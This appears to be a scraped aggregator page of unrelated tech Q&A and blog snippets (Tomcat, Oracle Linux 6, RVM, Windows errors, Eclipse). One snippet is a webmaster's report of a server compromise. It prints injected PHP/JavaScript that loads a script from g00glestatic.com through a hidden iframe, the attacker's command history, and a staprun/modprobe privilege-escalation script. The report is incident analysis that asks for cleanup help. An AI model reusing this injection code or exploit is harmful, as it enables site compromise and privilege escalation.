    I thought I would be a ball of intimated nerves when Kevin gladly agreed to speak with me on the podcast this past weekend.  After all, he is Kevin Kline of SQL in a Nutshell fame! As it turned out,  we had a comfortable and enlightening conversation on Apple MacBooks (is that what they are called?), our beginnings in the indistry, the Deep South, health care intiatives and 286′s. I almost pulled the plug when Kevin started down the Oracle path though, and for a moment he looked at me as if I was serious. As always on this podcast, it is all in good fun. The picture is of Kevin and I ( my shirt is mauve not pink by the way) at the after party for SQL Saturday 151 in Orlando, FL where he also did a Pre-Con to a sold out crowd of enthusiastic DBAs. I know they were enthusiastic even though I was not there because one of the attendees was a friend of mine who went on and on and on about the content, kind of like I am doing here.  So I will just stop that and let you proceed to listen. As always, I hope you enjoy and any feedback on this or future episodes is always welcome. Download the MP3

    Read the article

  • Tomcat6 Manager Webapp returns a 404

    - by Noel
    http://localhost:8080/manager/html gives a 404 error on apt-get install of tomcat6 (6.0.28 on JVM 1.6.0_20-b20 on 2.6.35-27-generic amd64). http://localhost:8080/host-manager/html works. Lists one Host name, localhost. Installed tomcat6-admin with apt-get. ls dpkg -l | grep -i tomcat6-admin ii tomcat6-admin 6.0.28-2ubuntu1.1 Servlet and JSP engine -- admin web applications $ cat /usr/share/tomcat6/conf/tomcat-users.xml <tomcat-users> <role rolename="admin"/> <role rolename="manager" /> <user username="tomcatuser" password="Password1" roles="admin,manager"/> </tomcat-users> cat /usr/share/tomcat6/conf/Catalina/localhost/manager.xml <Context path="/manager" docBase="/usr/share/tomcat6-admin/manager" antiResourceLocking="false" privileged="true" /> <role name="manager" /> <user name="manager" password="Password1" roles="manager" /> <user name="tomcatuser" password="Password1" roles="manager" /> Those two files are the only documentation I've seen on how to setup the Manager webapp, and they seem to be compliant with the requirements.

    Read the article

  • Oracle Linux 6 DVDs Now Available

    - by sergio.leunissen
    On Sunday 6 February 2011, Oracle Linux 6 was released on the Unbreakable Linux Network for customers with an Oracle Linux support subscription. Shortly after that, the Oracle Linux 6 RPMs were made available on our public yum server. Today we published the installation DVD images on edelivery.oracle.com/linux. Oracle Linux 6 is free to download, install and use. The full release notes are here, but similar to my recent post about Oracle Linux 5.6, I wanted to highlight a few items about this release. Unbreakable Enterprise Kernel As is the case with Oracle Linux 5.6, the default installed kernel on x86_64 platform in Oracle Linux 6 is the Unbreakable Enterprise Kernel. If you haven't already, I highly recommend you watch the replay of this webcast by Chris Mason on the performance improvements made in this kernel. # uname -r 2.6.32-100.28.5.el6.x86_64 The Unbreakable Enterprise Kernel is delivered via the package kernel-uek: [root@localhost ~]# yum info kernel-uek ... Installed Packages Name : kernel-uek Arch : x86_64 Version : 2.6.32 Release : 100.28.5.el6 Size : 84 M Repo : installed From repo : anaconda-OracleLinuxServer-201102031546.x86_64 Summary : The Linux kernel URL : http://www.kernel.org/ License : GPLv2 Description: The kernel package contains the Linux kernel (vmlinuz), the core of : any Linux operating system. The kernel handles the basic functions : of the operating system: memory allocation, process allocation, : device input and output, etc. ext4 file system The ext4 or fourth extended filesystem replaces ext3 as the default filesystem in Oracle Linux 6. # mount /dev/mapper/VolGroup-lv_root on / type ext4 (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) tmpfs on /dev/shm type tmpfs (rw,rootcontext="system_u:object_r:tmpfs_t:s0") /dev/sda1 on /boot type ext4 (rw) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) Red Hat compatible kernel Oracle Linux 6 also includes a Red Hat compatible kernel built directly from RHEL source. It's already installed, so booting it is a matter of editing /etc/grub.conf # rpm -qa | grep kernel-2.6.32 kernel-2.6.32-71.el6.x86_64 Oracle Linux 6 no longer includes a Red Hat compatible kernel with Oracle bug fixes. The only Red Hat compatible kernel included is the one built directly from RHEL source. Yum-only access to Unbreakable Linux Network (ULN) Oracle Linux 6 uses yum exclusively for access to Unbreakable Linux Network. To register your system with ULN, use the following command: # uln_register No Itanium Support Oracle Linux 6 is not supported on the Itanium (ia64) platform. Next Steps Read the release notes Download Oracle Linux 6 for free Discuss on the Oracle Linux forum

    Read the article

  • error while running ruby application at system startup in ubuntu

    - by anjo
    I am on Ubuntu 12.04 machine. Have a script file which runs when entered manually in terminal gnome-terminal -e /home/precise/Desktop/cartodb/script.sh The content of script file is cd /home/ubuntupc/Desktop/cartodb20/ sh /home/ubuntupc/.rvm/scripts/rvm bundle exec foreman start -p 3000 So what i tried to do is to run this script at every system start up. So on Startup Applications command: gnome-terminal -e /home/precise/Desktop/cartodb/script.sh On terminal Edit - Profile Preferences - Title and Command Checked the "Run command as a login shell" But this seems to be not working. When restarted the machine found these error in terminal The child process exited normally with status 127. ERROR: RVM Ruby not used, run `rvm use ruby` first. Some info regarding the installed packages and system. $ which ruby /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/bin/ruby $ which rails /home/ubuntupc/.rvm/gems/ruby-1.9.2-p320/bin/rails $ which gem /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/bin/gem $ cat ~/.bash_profile [[ -s "$HOME/.profile" ]] && source "$HOME/.profile" # Load the default .profile [[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function* $ which -a ruby /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/bin/ruby $ sudo update-alternatives --config ruby update-alternatives: error: no alternatives for ruby. $ sudo find / -name "rubygems" -print /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/lib/ruby/site_ruby/1.9.1/rubygems /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/lib/ruby/1.9.1/rubygems /home/ubuntupc/.rvm/src/ruby-1.9.2-p320/lib/rubygems /home/ubuntupc/.rvm/src/ruby-1.9.2-p320/test/rubygems /home/ubuntupc/.rvm/src/ruby-1.9.2-p320/test/rubygems/rubygems /home/ubuntupc/.rvm/src/ruby-1.9.2-p320/doc/rubygems /home/ubuntupc/.rvm/src/rubygems-2.2.1/lib/rubygems /home/ubuntupc/.rvm/src/rubygems-2.2.1/test/rubygems /home/ubuntupc/.rvm/src/rubygems-2.2.1/test/rubygems/rubygems /home/ubuntupc/.rvm/src/rvm/scripts/functions/rubygems /home/ubuntupc/.rvm/src/rvm/scripts/rubygems /home/ubuntupc/.rvm/scripts/functions/rubygems /home/ubuntupc/.rvm/scripts/rubygems /usr/lib/ruby/1.9.1/rubygems /usr/local/rvm/rubies/ruby-1.9.2-p320/lib/ruby/site_ruby/1.9.1/rubygems /usr/local/rvm/rubies/ruby-1.9.2-p320/lib/ruby/1.9.1/rubygems /usr/local/rvm/src/ruby-1.9.2-p320/lib/rubygems /usr/local/rvm/src/ruby-1.9.2-p320/test/rubygems /usr/local/rvm/src/ruby-1.9.2-p320/test/rubygems/rubygems /usr/local/rvm/src/ruby-1.9.2-p320/doc/rubygems /usr/local/rvm/src/rubygems-2.2.0/lib/rubygems /usr/local/rvm/src/rubygems-2.2.0/test/rubygems /usr/local/rvm/src/rubygems-2.2.0/test/rubygems/rubygems /usr/local/rvm/src/rvm/scripts/functions/rubygems /usr/local/rvm/src/rvm/scripts/rubygems /usr/local/rvm/scripts/functions/rubygems /usr/local/rvm/scripts/rubygems Please point out what i am missing as i am new to the ruby applications. Thanks in advance

    Read the article

  • Mass targeted malware installed - g00glestatic.com [closed]

    - by Silver89
    Possible Duplicate: My server’s been hacked EMERGENCY I run a webserver which over the last few days seems to have become infected with malware that tries to include content from "http://g00glestatic.com/s.js" It appears the attacker gained access to one of the user accounts (not root), made a few changes, added a few files and ran a few bash commands. These changes stuck out clearly to me because it is not a shared server and I am the only person with access through very secure passwords. The php/javascript code that was added .php files, this code was added: #9c282e# if(!$srvc_counter) { echo "<script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>"; $srvc_counter = true;} #/9c282e# .js files, this code was added: /*9c282e*/ var _f = document.createElement('iframe'),_r = 'setAttribute'; _f[_r]('src', 'http://g00glestatic.com/s.js'); _f.style.position = 'absolute';_f.style.width = '10px'; _f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1); _f.style.left = '-5540px'; document.write('<div id=\'MIX_ADS\'></div>'); document.getElementById('MIX_ADS').appendChild(_f); /*/9c282e*/ The bash command taken from .bash_history (Some usernames/passwords have been subbed) su -c id $replacedPassword id; id; sudo id; replacedPassword id; cd /home/replacedUserId1; chmod +x .sess_28e2f1bc755ed3ca48b32fbcb55b91a7; ./.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; rm /home/replacedUserId1/.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; id; cd /home/replacedUserId1; chmod +x .sess_05ee5257fed0ac8e0f12096f4c3c0d20; ./.sess_05ee5257fed0ac8e0f12096f4c3c0d20; rm /home/replacedUserId1/.sess_05ee5257fed0ac8e0f12096f4c3c0d20; id; cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id; cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id; cd /home/replacedUserId1; chmod +x .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; ./.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; rm /home/replacedUserId1/.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; id; kill -9 $$;; kill -9 $$;; kill -9 $$; The above seems to move files added to the public_html to the level above? I also have all 4 of the files that were added: .sess_28e2f1bc755ed3ca48b32fbcb55b91a7 .sess_05ee5257fed0ac8e0f12096f4c3c0d20 .sess_bfa542fc2578cce68eb373782c5689b9 .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e Of those four above files, three are none viewable in notepad++ and display null characters, whereas sess_fb19dfb52ed4a3ae810cd4454ac6ef1e consists of: #!/bin/sh export PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/bin; export LC_ALL=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8 export TERM=linux echo -n "-> checking staprun: "; if which staprun 2>&1 | grep -q "no $1"; then flag=1 elif [ -z "`which $1 2>&1`" ]; then flag=1; fi if [ "$flag" = "1" ]; then echo "no staprun, exiting"; exit; else echo "found"; echo "-> trying to exploit... "; printf "install uprobes /bin/sh" > ololo.conf; MODPROBE_OPTIONS="-C ololo.conf" staprun -u ololo rm -f ololo.conf fi Other Noticeable Edits Any files that contain: ([.htaccess]|[index|header|footer].php|[*.js]) will have been modified and all system file and directory permissions will have been changed to: x--x--x My steps to remove this malware re uploaded original php/js files to revert any changes Changed all user passwords Modified hosts.allow to a static ip so that only I have access Removed the above 4 files and checked all modified file dates within that directory to check for any other recent modifications, none can be found Conclusion I'm hoping that as they did not have root access, any changes they wished to make higher up failed and they were only able to display an iframe on the site for a short amount of time? What else do I need to look for to check the malware infection has not spread? Second Conclusion This malware sinks too deep to 'clean', if you get infected I recommend a server nuke and rebuild from backups with increased security. Possibility It's possible that Filezilla ftp passwords were stolen through a trojan as they're unfortunately stored unencrypted. However Trend Micro Titanium has not found any. The settings box to disable passwords being saved has now been ticked, I also recommend that you take this action.

    Read the article

  • Running sfc /scannow provides the error The specific error code is 0x000006ba [The RPC server is una

    - by leeand00
    I think that my mup.sys file is corrupted, I received the following error when trying to access a network share that was located on my Windows 7 box, from my Windows xp box: No network provider accepted the given network path. After reading this I attempted to follow the directions by entering my computer into safe mode. After I run "sfc /scannow" I receive the following error message: The specific error code is 0x000006ba [The RPC server is unavailable]. Additionally when I go into Services, it says that the Remote Procedure Call (RPC) service is running but that the Remote Procedure Call (RPC) Locator is not running. When I try to start the Remote Procedure Call (RPC) Locator, it gives me an error saying: Error 1084: This service cannot be started in Safe Mode So what can I do about this exactly? If it can't find the Remote Procedure Call service in safe mode?

    Read the article

  • Upgrading from Vista Home Basic to Vista Business

    - by miracle2k
    I have a PC that came with Vista Home Basic, and I now have some need for Remote Desktop, which is not included in Home Basic, so I'd like to upgrade. Now, there is apparently some hack to get Remote Desktop working in Home Premium, and obviously, it's in Ultimate, but really, the Business Edition would be the best fit for us. Unfortunately, Windows Anytime Upgrade does not provide a path from Home Basic to Business. My question is, if I were to buy a standalone Vista Business license, could I use it to do an upgrade from my current Home Basic installation? Would it be simply entering the new license key?

    Read the article

  • Cannot find one or more components. Please reinstall application

    - by Chris
    I am running Windows 8, 64 bit and have SQL Server 2012 installed. I downloaded the client tools, looked in the directory for SQL Server Management Studio, and see it's there. When I try to run SQL Management Studio I receive the error message: "Cannot find one or more components. Please reinstall application". This problem just started. I have reinstalled the application and downloaded the service packs. The shortcut key shows the path but it still will not run.

    Read the article

  • Eclipse says "Access Denied" when running javaw and how to fix it?

    - by Eduardo de Luna
    I'm trying to get Eclipse to compile and run a HelloWorld class but it can't even do that. I have installed Eclipse x86 SDK 4.2.0 together bit with the latest JRE and JDK both in 64 bit as well. I also have the PATH variables set to respond to command prompts. When I try to run the following code: class HelloWorld { public static void main(String[] args) { System.out.println("Hello World!" ) ; } } And it returns the following error: Exception occurred executing command line. Cannot run program "C:\Program Files\Java\jre7\bin\javaw.exe" (in directory "C:\Users\Default\workspace\devs"): CreateProcess error=5, Access is denied. Can you help me fix this? Thanks!

    Read the article

  • CodeIt.Right Code File Header Template For StyleCop Rules

    - by Paulo Morgado
    I like to use both StyleCop and CodeIt.Right to validate my code – StyleCop because it’s free and CodeIt.Right because it’s really good. While StyleCop provides only validation, CodeIt.Righ provides both validation and correction of violations. Unfortunately, CodeIt.Right’s supplied template for code file headers does not conform to StyleCop rules. Fortunately, CodeIt.Right allows us to define our own template. Here’s the one I use: <#@ template language="C#" #> //----------------------------------------------------------------------- // <copyright file="<#= System.IO.Path.GetFileName(Context.DestinationFile) #>" // project="<#= Context.ProjectName #>" // assembly="<#= Context.AssemblyName #>" // solution="<#= Context.SolutionName #>" // company="<#= Context.GetGlobalProperty("CompanyName") #>"> // Copyright (c) <#= Context.GetGlobalProperty("CompanyName") #>. All rights reserved. // </copyright> // <author id="<#= Context.GetGlobalProperty("UserID") #>"><#= Context.GetGlobalProperty("UserName") #></author> // <summary></summary> //-----------------------------------------------------------------------

    Read the article

  • Unable to install Google Chrome

    - by Jordan
    I receive this in my terminal when I try to install using wget https://dl.google.com/linux/direct/google-chrome-stable_current_i386.deb sudo dpkg -i google-chrome* or sudo dpkg --install /Path/to/chrome.deb I receive Selecting previously unselected package google-chrome-stable. (Reading database ... 146911 files and directories currently installed.) Unpacking google-chrome-stable (from google-chrome-stable_current_i386.deb) ... dpkg: dependency problems prevent configuration of google-chrome-stable: google-chrome-stable depends on xdg-utils (>= 1.0.2). dpkg: error processing google-chrome-stable (--install): dependency problems - leaving unconfigured Processing triggers for man-db ... Processing triggers for bamfdaemon ... Rebuilding /usr/share/applications/bamf.index... Processing triggers for desktop-file-utils ... Processing triggers for gnome-menus ... Errors were encountered while processing: google-chrome-stable I then type sudo apt-get install -f And retry installation though it still does not install and I receive the same errors. I have also tried using: sudo apt-get install libxss1 libnspr4-0d libcurl3 Though the above doesn't work either.

    Read the article

  • Downloading a file over HTTP the SSIS way

    This post shows you how to download files from a web site whilst really making the most of the SSIS objects that are available. There is no task to do this, so we have to use the Script Task and some simple VB.NET or C# (if you have SQL Server 2008) code. Very often I see suggestions about how to use the .NET class System.Net.WebClient and of course this works, you can code pretty much anything you like in .NET. Here I’d just like to raise the profile of an alternative. This approach uses the HTTP Connection Manager, one of the stock connection managers, so you can use configurations and property expressions in the same way you would for all other connections. Settings like the security details that you would want to make configurable already are, but if you take the .NET route you have to write quite a lot of code to manage those values via package variables. Using the connection manager we get all of that flexibility for free. The screenshot below illustrate some of the options we have. Using the HttpClientConnection class makes for much simpler code as well. I have demonstrated two methods, DownloadFile which just downloads a file to disk, and DownloadData which downloads the file and retains it in memory. In each case we show a message box to note the completion of the download. You can download a sample package below, but first the code: Imports System Imports System.IO Imports System.Text Imports System.Windows.Forms Imports Microsoft.SqlServer.Dts.Runtime Public Class ScriptMain Public Sub Main() ' Get the unmanaged connection object, from the connection manager called "HTTP Connection Manager" Dim nativeObject As Object = Dts.Connections("HTTP Connection Manager").AcquireConnection(Nothing) ' Create a new HTTP client connection Dim connection As New HttpClientConnection(nativeObject) ' Download the file #1 ' Save the file from the connection manager to the local path specified Dim filename As String = "C:\Temp\Sample.txt" connection.DownloadFile(filename, True) ' Confirm file is there If File.Exists(filename) Then MessageBox.Show(String.Format("File {0} has been downloaded.", filename)) End If ' Download the file #2 ' Read the text file straight into memory Dim buffer As Byte() = connection.DownloadData() Dim data As String = Encoding.ASCII.GetString(buffer) ' Display the file contents MessageBox.Show(data) Dts.TaskResult = Dts.Results.Success End Sub End Class Sample Package HTTPDownload.dtsx (74KB)

    Read the article

  • SOLVED:Bootloader isn't executable booting XEN PV Guest with virtual-manager

    - by user2284355
    I am going insane with an error I am encountering while trying to install a PV Guest of Debian Wheezy on a Ubuntu Server precise Xen default build with libvirt. The steps I take with virt-manager are the following: 1.Net install via: http://ftp.es.debian.org/debian/dists/stable/main/installer-amd64/ 2.Install process is flawless, installed via VNC over virt-manager 3.When the VM starts I get the following error: Error starting domain: POST operation failed: xend_post: error from xen daemon: (xend.err "Bootloader isn't executable") Most answers i have found on google say that I need to edit the VM's .cfg file and correct the path to pygrub but virt-manager does not seem to create this file (I have searched the entire drive with "find". Another detail is that virsh list --all shows no VMs (Not even dom0) while the command xm list shows all of them. Any help is much appreciated. EDIT: Connected remotely via virsh: virsh -c xen+ssh://user@ip dumpxml vmname Found line: /usr/bin/pygrub ln -s /usr/lib/xen-4.1/bin/pygrub /usr/bin/pygrub Now it works. If anyone can think of a better solution give me a shout. Cheers

    Read the article

< Previous Page | 608 609 610 611 612 613 614 615 616 617 618 619  | Next Page >